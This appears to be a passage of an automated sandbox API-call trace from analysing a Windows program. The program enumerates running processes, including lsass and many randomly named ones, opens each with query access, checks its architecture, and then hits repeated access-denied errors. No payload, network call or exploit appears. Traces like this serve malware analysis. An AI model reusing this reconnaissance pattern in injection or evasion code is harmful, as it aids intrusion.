	[0074.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0074.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0074.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0074.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0074.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0074.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dc80, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0074.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0074.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0074.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0074.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0074.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0074.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0074.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0074.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0074.875] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.875] CloseHandle (hObject=0x224) returned 1
	[0074.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0074.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0074.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0074.876] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.876] CloseHandle (hObject=0x224) returned 1
	[0074.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7287f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0074.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0074.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0074.876] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.877] CloseHandle (hObject=0x224) returned 1
	[0074.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0074.877] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.877] CloseHandle (hObject=0x224) returned 1
	[0074.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0074.877] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.877] CloseHandle (hObject=0x224) returned 1
	[0074.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0074.878] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.879] CloseHandle (hObject=0x224) returned 1
	[0074.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0074.879] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.879] CloseHandle (hObject=0x224) returned 1
	[0074.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0074.879] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.879] CloseHandle (hObject=0x224) returned 1
	[0074.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0074.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0074.880] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.880] CloseHandle (hObject=0x224) returned 1
	[0074.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0074.880] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.880] CloseHandle (hObject=0x224) returned 1
	[0074.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0074.881] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.881] CloseHandle (hObject=0x224) returned 1
	[0074.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728958, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0074.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0074.882] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.882] CloseHandle (hObject=0x224) returned 1
	[0074.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0074.882] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.882] CloseHandle (hObject=0x224) returned 1
	[0074.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dcb0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0074.883] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.883] CloseHandle (hObject=0x224) returned 1
	[0074.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7288b8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0074.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0074.883] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.883] CloseHandle (hObject=0x224) returned 1
	[0074.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e7e8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0074.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0074.883] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.883] CloseHandle (hObject=0x224) returned 1
	[0074.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0074.884] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.884] CloseHandle (hObject=0x224) returned 1
	[0074.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0074.884] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.884] CloseHandle (hObject=0x224) returned 1
	[0074.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0074.885] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.885] CloseHandle (hObject=0x224) returned 1
	[0074.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728a58, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0074.885] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.885] CloseHandle (hObject=0x224) returned 1
	[0074.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7288b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0074.886] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.886] CloseHandle (hObject=0x224) returned 1
	[0074.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0074.887] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.891] CloseHandle (hObject=0x224) returned 1
	[0074.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x7721d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0074.892] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.892] CloseHandle (hObject=0x224) returned 1
	[0074.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72ea18, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0074.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0074.892] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.892] CloseHandle (hObject=0x224) returned 1
	[0074.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0074.892] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.893] CloseHandle (hObject=0x224) returned 1
	[0074.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7721b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0074.893] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.893] CloseHandle (hObject=0x224) returned 1
	[0074.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0074.894] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.894] CloseHandle (hObject=0x224) returned 1
	[0074.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0074.894] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.895] CloseHandle (hObject=0x224) returned 1
	[0074.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728858, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0074.895] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.895] CloseHandle (hObject=0x224) returned 1
	[0074.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e6d0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0074.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0074.895] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.895] CloseHandle (hObject=0x224) returned 1
	[0074.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e860, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0074.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.896] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.896] CloseHandle (hObject=0x224) returned 1
	[0074.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.896] GetLastError () returned 0x5
	[0074.896] GetLastError () returned 0x5
	[0074.897] GetLastError () returned 0x5
	[0074.897] GetLastError () returned 0x5
	[0074.897] GetLastError () returned 0x5
	[0074.897] GetLastError () returned 0x5
	[0074.897] GetLastError () returned 0x5
	[0074.897] GetLastError () returned 0x5
	[0074.897] GetLastError () returned 0x5
	[0074.897] GetLastError () returned 0x5
	[0074.897] GetLastError () returned 0x5
	[0074.897] GetLastError () returned 0x5
	[0074.897] GetLastError () returned 0x5
	[0074.897] GetLastError () returned 0x5
	[0074.897] GetLastError () returned 0x5
	[0074.897] GetLastError () returned 0x5
	[0074.897] GetLastError () returned 0x5
	[0074.897] GetLastError () returned 0x5
	[0074.897] GetLastError () returned 0x5
	[0074.897] GetLastError () returned 0x5
	[0074.897] GetLastError () returned 0x5
	[0074.897] GetLastError () returned 0x5
	[0074.897] GetLastError () returned 0x5
	[0074.897] GetLastError () returned 0x5
	[0074.897] GetLastError () returned 0x5
	[0074.898] GetLastError () returned 0x5
	[0074.898] GetLastError () returned 0x5
	[0074.898] GetLastError () returned 0x5
	[0074.898] GetLastError () returned 0x5
	[0074.898] GetLastError () returned 0x5
	[0074.898] GetLastError () returned 0x5
	[0074.898] GetLastError () returned 0x5
	[0074.898] GetLastError () returned 0x5
	[0074.898] GetLastError () returned 0x5
	[0074.898] GetLastError () returned 0x5
	[0074.898] GetLastError () returned 0x5
	[0074.898] GetLastError () returned 0x5
	[0074.898] GetLastError () returned 0x5
	[0074.898] GetLastError () returned 0x5
	[0074.898] GetLastError () returned 0x5
	[0074.898] GetLastError () returned 0x5
	[0074.898] GetLastError () returned 0x5
	[0074.898] GetLastError () returned 0x5
	[0074.898] GetLastError () returned 0x5
	[0074.898] GetLastError () returned 0x5
	[0074.898] GetLastError () returned 0x5
	[0074.899] GetLastError () returned 0x5
	[0074.899] GetLastError () returned 0x5
	[0074.899] GetLastError () returned 0x5
	[0074.899] GetLastError () returned 0x5
	[0074.899] GetLastError () returned 0x5
	[0074.899] GetLastError () returned 0x5
	[0074.899] GetLastError () returned 0x5
	[0074.899] GetLastError () returned 0x5
	[0074.899] GetLastError () returned 0x5
	[0074.899] GetLastError () returned 0x5
	[0074.899] GetLastError () returned 0x5
	[0074.899] GetLastError () returned 0x5
